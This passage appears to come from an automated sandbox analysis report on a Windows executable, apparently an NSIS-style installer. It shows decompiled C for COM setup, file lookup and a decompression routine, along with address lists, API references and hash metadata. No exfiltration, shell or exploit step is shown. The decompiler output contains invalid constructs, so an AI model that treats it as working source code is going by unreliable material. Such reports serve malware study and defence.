						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                0x00402174
                                                                                0x0040217e
                                                                                0x00402188
                                                                                0x00402195
                                                                                0x004021a0
                                                                                0x004021a3
                                                                                0x004021bd
                                                                                0x004021c3
                                                                                0x004021c9
                                                                                0x004021cc
                                                                                0x004021d6
                                                                                0x004021da
                                                                                0x004021da
                                                                                0x004021df
                                                                                0x004021f0
                                                                                0x004021f8
                                                                                0x004022d4
                                                                                0x004022d4
                                                                                0x004022db
                                                                                0x004021fe
                                                                                0x004021fe
                                                                                0x0040220d
                                                                                0x00402211
                                                                                0x00402214
                                                                                0x0040221a
                                                                                0x00402228
                                                                                0x0040222b
                                                                                0x0040222d
                                                                                0x00402238
                                                                                0x00402238
                                                                                0x0040223d
                                                                                0x0040223f
                                                                                0x00402246
                                                                                0x00402246
                                                                                0x00402249
                                                                                0x00402252
                                                                                0x00402255
                                                                                0x0040225a
                                                                                0x0040225c
                                                                                0x00402269
                                                                                0x00402269
                                                                                0x0040226c
                                                                                0x00402278
                                                                                0x0040227b
                                                                                0x00402284
                                                                                0x0040228a
                                                                                0x00402291
                                                                                0x004022aa
                                                                                0x004022ac
                                                                                0x004022ba
                                                                                0x004022ba
                                                                                0x004022aa
                                                                                0x004022bd
                                                                                0x004022c3
                                                                                0x004022c3
                                                                                0x004022c6
                                                                                0x004022cc
                                                                                0x004022d2
                                                                                0x004022e7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004022d2
                                                                                0x004022dd
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                • API String ID: 123533781-47812868
                                                                                • Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                                • Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
                                                                                • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 39%
                                                                                			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                0x004027b9
                                                                                0x004027cd
                                                                                0x004027d8
                                                                                0x004027d9
                                                                                0x00402918
                                                                                0x004027bb
                                                                                0x004027bb
                                                                                0x004027bd
                                                                                0x004027bf
                                                                                0x004027bf
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID:
                                                                                • API String ID: 1974802433-0
                                                                                • Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                • Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
                                                                                • Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
                                                                                • Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406A9B, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040720A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3d0;
												if( *0x42e3d0 != 0) {
													L22:
													_t412 =  *0x40a444; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a448; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d24c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d248; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d250;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6d0;
													if(_t416 < 0x42d6d0) {
														L15:
														__eflags = _t416 - 0x42d48c;
														_t438 = 8;
														if(_t416 > 0x42d48c) {
															__eflags = _t416 - 0x42d650;
															if(_t416 >= 0x42d650) {
																__eflags = _t416 - 0x42d6b0;
																if(_t416 < 0x42d6b0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d250, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d250 + _t440;
														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
														 *0x42e3d0 =  *0x42e3d0 + 1;
														__eflags =  *0x42e3d0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
